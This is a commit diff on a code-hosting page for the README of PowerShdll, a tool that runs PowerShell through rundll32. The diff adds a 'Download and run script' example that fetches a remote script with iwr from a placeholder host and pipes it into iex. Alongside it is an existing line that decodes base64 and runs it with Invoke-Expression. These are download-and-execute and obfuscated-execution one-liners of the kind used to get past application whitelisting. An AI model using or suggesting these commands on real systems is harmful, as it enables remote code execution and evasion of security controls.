Projects STRLCPY PowerShdll Commits 7772482a
🤬
Revision indexing in progress... (symbol navigation in revisions will be accurate after indexed)
  • ■ ■ ■ ■
    README.md
    skipped 24 lines
    25 25  ```
    26 26  rundll32 Powershdll.dll,main $a = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String("BASE64")); Invoke-Expression $a
    27 27  ```
    28  - 
     28 +### Download and run script
     29 +```
     30 +rundll32 PowerShdll.dll,main . { iwr -useb https://website.com/Script.ps1 } ^| iex;
     31 +```
    29 32  ## Known Issues
    30 33   
    31 34  Some errors do not seem to show in the output. May be confusing as commands such as Import-Module do not output an error on failure.
    skipped 3 lines
Please wait...
Page is in error, reload to recover